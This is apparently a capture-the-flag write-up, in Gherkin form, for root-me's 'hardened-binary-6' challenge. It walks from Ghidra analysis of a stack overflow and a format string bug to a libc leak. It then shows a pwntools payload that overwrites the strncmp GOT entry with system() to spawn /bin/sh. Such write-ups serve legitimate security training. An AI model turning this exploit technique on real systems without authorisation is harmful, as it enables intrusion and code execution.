## Version 2.0
## language: en

Feature: hardened-binary-6
  Site:
    root-me
  Category:
    app-systeme
  User:
    m'baku
  Goal:
    Get shell and read the password

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | gdb-pwndbg      | 1.1.0     |
    | VMware          | 15.5.6    |
    | Ghidra          | 9.1.2     |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then I see the environment configuration
    """
    PIE: disabled
    Relro: disabled
    NX: enabled (heap and stack)
    ASLR: enabled
    SF: disabled
    SSP: enabled
    SRC: disabled
    """

  Scenario: Success: Analyzing the binary
    Given the source code is not provided
    Then I analyze the binary with Ghidra
    And I notice a couple of bugs that I am going to explain in detail
    Then the bugs are:
    """
    1. Stack buffer overflow
    2. Format String Bug
    """
    And to see how the first bug is triggered, stack overflow
    Then I had to parse the "process_action" function [evidences](buff.png)
    """
    ...
    char gg_buff [128];
    char game [64];
    undefined buff [64];
    undefined4 canary;

    canary = *(undefined4 *)(in_GS_OFFSET + 0x14);
    memset(game,0,0x40);
    do {
        printf("\n\t>");
        fflush(stdout);
        fgets(game,0x40,stdin);
        ret = strncmp(game,"gangster",8);
        if (ret == 0) {
            memcpy(buff,&DAT_08048ad5,1);
            puts("\thttp://www.roi-heenok.com/html/images/gifs/watermark
            /watermark_090222105335455462.gif");
            fflush(stdout);
            fgets(gg_buff,0x80,stdin);
            lengame = strlen(game);
            memcpy(game + lengame,gg_buff,0x80);
            ret = strncmp(gg_buff,"g&g",3);
            if (ret != 0) {
                print_errors(buff);
            }
        }
    ...
    """
    And due to the memcpy it's possible overflow the game buffer
    When the length of gg_buff is greater than 0x40 (64d)
    And lengame is grater than zero
    """
    memcpy(game + lengame,gg_buff,0x80);
    """
    Then there is another bug inside the "print_errors" function
    And it's about Format String Bug (FSB) [evidences](fmtbug.png)
    """
    void print_errors(char *buff)

    {
        int in_GS_OFFSET;
        char local_buff [1024];
        int canary;

        canary = *(int *)(in_GS_OFFSET + 0x14);
        strncpy(local_buff,buff,0x400);
        puts("Error !");
        printf(local_buff);
        if (canary != *(int *)(in_GS_OFFSET + 0x14)) {
          /* WARNING: Subroutine does not return */
          __stack_chk_fail();
        }
        return;
    }
    """
    Then the bug is due to
    """
    void print_errors(char *buff)
    {
        ...
        strncpy(local_buff,buff,0x400);
        ...
        printf(local_buff);
    """
    When the buffer (buff) is passed as an argument
    Then it is copied to a local buffer (local_buff)
    And this is printed without having any format specifier
    Then this can allow a Format String Attack

  Scenario: Success: Leaking with Format String Attack
    Given there is an FSB
    Then the idea is to use this bug to leak pointers
    And avoid ASLR
    Then to trigger the FSB I need to use the BoF to write to the "buff" buffer
    And specify the format to leak
    Then there is a much more elegant and less expensive way to leak
    And it is the one that I will use
    """
    char gg_buff [128];
    char game [64];
    undefined buff [64];
    undefined4 canary;

    canary = *(undefined4 *)(in_GS_OFFSET + 0x14);
    memset(game,0,0x40);
    """
    When I see the initialization of the buffers
    Then I notice that it only initializes the game buffer
    """
    memset(game,0,0x40);
    """
    And to fill the buff (arbitrarily) is necessary to overflow the game buffer
    Then if I don't overflow I can take its initial data (pointers in stack)
    And I found that one of its initial pointers was "_IO_2_1_stdout_"
    Then I can leak this [evidences](leak.png)
    And reduce my exploit to just an attack vector
    """
    p.recvuntil('>')

    payload = ''
    payload += 'gentleman'

    p.sendline(payload)
    p.recvline()
    p.sendline('hola')
    p.recvline()

    leak_libc = u32(p.recv()[:4]) # _IO_2_1_stdout_
    """

  Scenario: Fail: Exploiting the binary
    Given I can perform a Format String Attack
    Then the idea is throught the FSB to overwrite an entry to the GOT
    And with the libc leak get the system() pointer
    Then I used GDB to get the LIBC base through the leak
    """
    pwndbg> vmmap
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x8048000  0x8049000 r-xp     1000 0      /ch26
    0x8049000  0x804a000 rw-p     1000 0      /ch26
    0x97c1000  0x97e3000 rw-p    22000 0      [heap]
    0xf7dcc000 0xf7f9e000 r-xp   1d2000 0      /lib32/libc-2.27.so
    0xf7f9e000 0xf7f9f000 ---p     1000 1d2000 /lib32/libc-2.27.so
    0xf7f9f000 0xf7fa1000 r--p     2000 1d2000 /lib32/libc-2.27.so
    0xf7fa1000 0xf7fa2000 rw-p     1000 1d4000 /lib32/libc-2.27.so
    0xf7fa2000 0xf7fa5000 rw-p     3000 0
    0xf7fb2000 0xf7fb4000 rw-p     2000 0
    0xf7fb4000 0xf7fb7000 r--p     3000 0      [vvar]
    0xf7fb7000 0xf7fb9000 r-xp     2000 0      [vdso]
    0xf7fb9000 0xf7fdf000 r-xp    26000 0      /lib32/ld-2.27.so
    0xf7fdf000 0xf7fe0000 r--p     1000 25000  /lib32/ld-2.27.so
    0xf7fe0000 0xf7fe1000 rw-p     1000 26000  /lib32/ld-2.27.so
    0xffa59000 0xffa7a000 rw-p    21000 0      [stack]
    pwndbg> p/x 0xf7fa1d80 - 0xf7dcc000
    $1 = 0x1d5d80
    pwndbg>
    """
    Then I chose strncmp GOT to override it with the system pointer
    """
    strncmp() -> system()
    """
    And then type "/bin/sh" to interpret it as system('/bin/sh')
    Then doing this would be enough in this way
    """
    got = 0x8049d8c # strncmp
    high = (system & 0xffff) - 8
    low = (system >> 16) - 8

    fmt = ''
    fmt += '%' + p32(got) # puts got
    fmt += p32(got + 2) # puts got + 2
    fmt += '%' + str(high) + 'c%11$hn'
    fmt += '%' + str((high - low)) + 'c%12$hn'

    p.sendline(fmt) # + '%p ' * 20)
    p.sendline('/bin/sh')
    """
    And this works locally but on the root-me server not
    Then this is because my LIBC is different from the one used by the server

  Scenario: Success: Exploiting the binary with the correct LIBC
    Given I need to find the exact version of LIBC
    Then I used the leak to look for differences in known LIBCs
    And there is an interesting page what helps to solve this
    """
    - LIBC database search
    https://libc.blukat.me/
    """ [evidences](libcdatabase.png)
    Then I just put the name of the leak and its two least significant bytes
    And I got the correct version of LIBC [evidences](correctlibc.png)
    Then I calculate the correct differences
    """
    p.recvline()

    leak_libc = u32(p.recv()[:4])
    libc = leak_libc - 0x1d8d80
    system = libc + 0x03d250

    print "Leak", hex(leak_libc)
    print "Libc", hex(libc)
    print "system()", hex(system)
    """
    And I overwrite the GOT
    Then this way I can get shell [evidences](shell.png)
